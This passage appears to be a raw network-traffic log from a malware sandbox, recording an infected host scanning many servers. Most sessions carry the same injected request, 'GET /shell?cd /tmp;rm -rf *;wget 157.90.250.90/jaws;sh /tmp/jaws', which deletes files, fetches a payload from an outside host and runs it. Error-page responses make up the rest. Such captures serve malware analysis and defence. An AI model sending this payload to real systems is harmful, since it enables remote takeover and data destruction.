                                                          Server: awselb/2.0
                                                          Date: Tue, 02 Jan 2024 05:24:03 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 134
                                                          Connection: keep-alive
                                                          Location: https://prognos-aircraft-dev.afiklmem.com:443/shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          94192.168.2.234962838.239.158.19680
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:03.470698118 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:03.775172949 CET307INHTTP/1.1 400 Bad Request
                                                          Server: nginx
                                                          Date: Tue, 02 Jan 2024 05:24:03 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 150
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          95192.168.2.2359250175.29.154.10180
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:03.503192902 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:03.840493917 CET400INHTTP/1.1 400 Bad Request
                                                          Date: Tue, 02 Jan 2024 05:24:03 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 241
                                                          Connection: close
                                                          Server: gocache
                                                          Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 54 68 65 20 70 6c 61 69 6e 20 48 54 54 50 20 72 65 71 75 65 73 74 20 77 61 73 20 73 65 6e 74 20 74 6f 20 48 54 54 50 53 20 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 63 65 6e 74 65 72 3e 54 68 65 20 70 6c 61 69 6e 20 48 54 54 50 20 72 65 71 75 65 73 74 20 77 61 73 20 73 65 6e 74 20 74 6f 20 48 54 54 50 53 20 70 6f 72 74 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 61 70 65 69 72 6f 38 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 68 74 6d 6c 3e 0a
                                                          Data Ascii: <html><head><title>400 The plain HTTP request was sent to HTTPS port</title></head><body><center><h1>400 Bad Request</h1></center><center>The plain HTTP request was sent to HTTPS port</center><hr><center>apeiro8</center></body><html>
                                                          Jan 2, 2024 06:24:04.046247959 CET400INHTTP/1.1 400 Bad Request
                                                          Date: Tue, 02 Jan 2024 05:24:03 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 241
                                                          Connection: close
                                                          Server: gocache
                                                          Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 54 68 65 20 70 6c 61 69 6e 20 48 54 54 50 20 72 65 71 75 65 73 74 20 77 61 73 20 73 65 6e 74 20 74 6f 20 48 54 54 50 53 20 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 63 65 6e 74 65 72 3e 54 68 65 20 70 6c 61 69 6e 20 48 54 54 50 20 72 65 71 75 65 73 74 20 77 61 73 20 73 65 6e 74 20 74 6f 20 48 54 54 50 53 20 70 6f 72 74 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 61 70 65 69 72 6f 38 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 68 74 6d 6c 3e 0a
                                                          Data Ascii: <html><head><title>400 The plain HTTP request was sent to HTTPS port</title></head><body><center><h1>400 Bad Request</h1></center><center>The plain HTTP request was sent to HTTPS port</center><hr><center>apeiro8</center></body><html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          96192.168.2.2344564171.244.56.10780
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:03.532179117 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:03.898334980 CET299INHTTP/1.1 404 Not Found
                                                          Date: Tue, 02 Jan 2024 05:24:03 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 146
                                                          Connection: keep-alive
                                                          Server: Byte-nginx
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          97192.168.2.235237049.232.101.10423
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:03.593482018 CET171INHTTP/1.0 200 OK
                                                          Server: Proxy
                                                          Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 31 2d 30 32 20 31 33 3a 32 34 3a 30 32 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a
                                                          Data Ascii: Unauthorized ...IP Address: 212.102.41.2MAC Address: Server Time: 2024-01-02 13:24:02Auth Result: ????.


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          98192.168.2.2345208134.0.11.20380
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:03.999635935 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:04.238635063 CET404INHTTP/1.1 400 Bad Request
                                                          Date: Tue, 02 Jan 2024 05:24:04 GMT
                                                          Server: Apache
                                                          Content-Length: 226
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          99192.168.2.233536013.239.48.11580
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:04.056293011 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:04.352189064 CET483INHTTP/1.1 400 Bad Request
                                                          Date: Tue, 02 Jan 2024 05:24:04 GMT
                                                          Server: Apache
                                                          Content-Length: 305
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 63 77 2d 76 70 6e 2d 73 79 64 30 31 2e 63 6c 6f 75 64 77 61 72 65 2e 63 6f 6d 2e 61 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache Server at cw-vpn-syd01.cloudware.com.au Port 80</address></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          100192.168.2.235193834.107.170.11680
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:04.121160984 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:04.242923021 CET441INHTTP/1.0 400 Bad Request
                                                          Content-Type: text/html; charset=UTF-8
                                                          Referrer-Policy: no-referrer
                                                          Content-Length: 273
                                                          Date: Tue, 02 Jan 2024 05:24:04 GMT
                                                          Data Raw: 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 74 65 78 74 3d 23 30 30 30 30 30 30 20 62 67 63 6f 6c 6f 72 3d 23 66 66 66 66 66 66 3e 0a 3c 68 31 3e 45 72 72 6f 72 3a 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 68 32 3e 59 6f 75 72 20 63 6c 69 65 6e 74 20 68 61 73 20 69 73 73 75 65 64 20 61 20 6d 61 6c 66 6f 72 6d 65 64 20 6f 72 20 69 6c 6c 65 67 61 6c 20 72 65 71 75 65 73 74 2e 3c 2f 68 32 3e 0a 3c 68 32 3e 3c 2f 68 32 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <html><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><title>400 Bad Request</title></head><body text=#000000 bgcolor=#ffffff><h1>Error: Bad Request</h1><h2>Your client has issued a malformed or illegal request.</h2><h2></h2></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          101192.168.2.235099043.139.38.17580
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:04.154187918 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:04.484289885 CET307INHTTP/1.1 400 Bad Request
                                                          Server: nginx
                                                          Date: Tue, 02 Jan 2024 05:24:04 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 150
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          102192.168.2.2347644154.223.106.9180
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:04.156292915 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:04.313081980 CET306INHTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Sun, 17 Dec 2017 07:47:25 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 146
                                                          Connection: keep-alive
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          103192.168.2.234142634.203.180.1380
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:04.156699896 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:04.313764095 CET307INHTTP/1.1 400 Bad Request
                                                          Server: nginx
                                                          Date: Tue, 02 Jan 2024 05:24:04 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 150
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          104192.168.2.2339410213.136.91.1780
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:04.299968004 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:04.584306002 CET105INHTTP/1.1 301
                                                          Connection: close
                                                          Location: https://127.0.0.1/shell?cd+/tmp;rm+-rf+*;wget+


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          105192.168.2.235241249.232.101.10423
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:04.397517920 CET171INHTTP/1.0 200 OK
                                                          Server: Proxy
                                                          Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 31 2d 30 32 20 31 33 3a 32 34 3a 30 33 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a
                                                          Data Ascii: Unauthorized ...IP Address: 212.102.41.2MAC Address: Server Time: 2024-01-02 13:24:03Auth Result: ????.


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          106192.168.2.2339428213.136.91.1780
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:04.789093018 CET80INHTTP/1.1 301
                                                          Connection: close
                                                          Location: https://mail.iteam.al


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          107192.168.2.235245249.232.101.10423
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:05.230531931 CET171INHTTP/1.0 200 OK
                                                          Server: Proxy
                                                          Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 31 2d 30 32 20 31 33 3a 32 34 3a 30 34 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a
                                                          Data Ascii: Unauthorized ...IP Address: 212.102.41.2MAC Address: Server Time: 2024-01-02 13:24:04Auth Result: ????.


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          108192.168.2.2347036207.91.250.5380
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:05.701900959 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:05.852229118 CET469INHTTP/1.1 400 Bad Request
                                                          Date: Tue, 02 Jan 2024 05:24:05 GMT
                                                          Server: Apache/2.4.57 (Fedora Linux) OpenSSL/3.0.8 mod_perl/2.0.12 Perl/v5.34.1
                                                          Content-Length: 226
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          109192.168.2.234892672.37.218.19980
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:05.713033915 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          110192.168.2.2341640104.79.255.2980
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:05.776320934 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:06.001100063 CET431INHTTP/1.0 400 Bad Request
                                                          Server: AkamaiGHost
                                                          Mime-Version: 1.0
                                                          Content-Type: text/html
                                                          Content-Length: 209
                                                          Expires: Tue, 02 Jan 2024 05:24:05 GMT
                                                          Date: Tue, 02 Jan 2024 05:24:05 GMT
                                                          Connection: close
                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 34 34 36 37 34 32 31 37 26 23 34 36 3b 31 37 30 34 31 37 33 30 34 35 26 23 34 36 3b 33 37 61 33 30 36 30 65 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                          Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;44674217&#46;1704173045&#46;37a3060e</BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          111192.168.2.234031045.15.66.2080
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:05.830727100 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:06.107048035 CET430INHTTP/1.1 400 Bad Request
                                                          Date: Tue, 02 Jan 2024 05:24:06 GMT
                                                          Server: Apache/2.4.6 (CentOS) PHP/7.4.33
                                                          Content-Length: 226
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
